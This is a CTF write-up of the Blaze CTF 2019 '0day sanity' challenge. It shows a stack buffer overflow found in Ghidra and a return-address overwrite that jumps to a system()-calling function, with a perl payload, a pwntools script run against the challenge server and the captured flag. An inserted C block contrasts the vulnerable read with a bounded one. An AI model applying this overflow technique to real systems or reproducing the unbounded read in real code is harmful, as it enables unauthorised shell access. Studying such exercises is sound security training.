Unleash the Beast!

Used for notes on CTFs and similar.

Blaze CTF 2019 - 0day sanity


After I connect to the server, it asks for base64-encoded data.

So I send "Bz==" to observe the behavior. The result is as follows.

****************
root@kali:~# nc chal.420blaze.in 42004
Give me a file (base64 encoded, followed by a newline):

Bz==
b'\x07'
thanks, time to pwn
your very own home: /tmp/tmppeijv007
analyzing your file.............
�sm0ke
time's up!
root@kali:~#
****************

 

[Vulnerability identification]

The binary file "chal" is also provided.

Decompiling "chal" with Ghidra, I found the vuln() function.

vuln() does the following:

(1) Open the file specified on the command line of "chal".

    -> fopen() is used.

(2) Read 0x100 bytes from the file into a buffer.

    -> fread() is used.

(3) Output the data from (2) with printf().

 

At (2), the length of the buffer is 128 bytes.

That is shorter than the number of bytes read (0x100 = 256), so there is a stack buffer overflow (BoF) vulnerability.
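As an added example (not code from the challenge binary or the author), the read pattern the writeup describes beside a bounded version. The 128-byte buffer and the 0x100-byte fread() come from the page; the function names and the in-memory test file are my own.

```c
#include <stdio.h>
#include <string.h>

/* Pattern described in the writeup: 128-byte stack buffer, 0x100-byte fread().
 * A file longer than 128 bytes overruns buf and reaches the saved return
 * address, which is what the exploit relies on. Shown for contrast only. */
void vuln_read(FILE *fp) {
    char buf[128];
    (void)fread(buf, 1, 0x100, fp);   /* writes up to 256 bytes into 128 */
    printf("%s", buf);                /* buf is also not NUL-terminated */
}

/* Hardened version: the read length is derived from the buffer size, one
 * byte is reserved for the terminator, and the caller gets the byte count. */
size_t safe_read(FILE *fp, char *buf, size_t bufsz) {
    if (bufsz == 0) return 0;
    size_t n = fread(buf, 1, bufsz - 1, fp);
    buf[n] = '\0';
    return n;
}

/* Demonstration helper (hypothetical): builds a constructed in-memory file of
 * `len` 'A' bytes, reads it with safe_read() into a 128-byte buffer and
 * returns how many bytes landed in the buffer. Returns (size_t)-1 if the
 * temp file cannot be created, (size_t)-2 if the buffer is not terminated. */
size_t demo_bounded_read(size_t len) {
    char buf[128];
    FILE *fp = tmpfile();
    if (!fp) return (size_t)-1;
    for (size_t i = 0; i < len; i++) fputc('A', fp);
    rewind(fp);
    size_t n = safe_read(fp, buf, sizeof buf);
    fclose(fp);
    if (strlen(buf) != n) return (size_t)-2;
    return n;
}

int main(void) {
    /* 0x100 bytes of input, the amount the original fread() requested,
     * are clipped to 127 by the bounded read; short input passes through. */
    printf("bytes kept from 0x100-byte input: %zu\n", demo_bounded_read(0x100));
    printf("bytes kept from 16-byte input:    %zu\n", demo_bounded_read(16));
    return 0;
}
```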

 

I sent a long base64-encoded string to the server.

-> As I expected, a segmentation fault happened.

   From the 145th byte of input onward, the return address of vuln() can be overwritten.

 

[Exploit]

I found the dont_mind_me() function at 0x8048506 in "chal".

It calls the system() function.

In the local environment, I can get a shell with the following procedure.

************************
root@kali:~/CTF# perl -e 'print "A"x144 . "\x06\x85\x04\x08" . "\n"' > flag3.txt
root@kali:~/CTF# ./chal flag3.txt
#
************************

The script for the remote environment is as follows.

Note: The location of flag.txt is given in the notification. -> /home/pwn/flag.txt

************************
# coding:utf-8
from pwn import *

host = "chal.420blaze.in"
port = 42004

r = remote(host, port)

# Read the prompt, then the two blank/prompt lines that follow it.
message = r.recvuntil(b"followed by a newline):")
r.recvline()
r.recvline()
print(message)

# 144 bytes of padding reach the saved return address of vuln(),
# which is then overwritten with the address of dont_mind_me().
code = b"A" * 144  # dummy
code += p32(0x8048506)
print(code)
print(b64e(code))
r.sendline(b64e(code))   # sendline() appends the required newline
r.sendline(b"")          # extra blank line, harmless for the spawned shell
r.sendline(b"cat /home/pwn/flag.txt")

r.interactive()
********************************

The result is...

********************************
root@kali:~# python solve_Blaze.py
[+] Opening connection to chal.420blaze.in on port 42004: Done
Give me a file (base64 encoded, followed by a newline):
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x06\x85\x0
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBBoUECA==
[*] Switching to interactive mode
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x06\x85\x04\x08'
thanks, time to pwn
your very own home: /tmp/tmpr_pjqy7v
analyzing your file.............
blaze{gratz_on_teh_l33t_smoked_0day}

============= NICE HIT =============


[*] Got EOF while reading in interactive
$
**************************************

The flag is: blaze{gratz_on_teh_l33t_smoked_0day}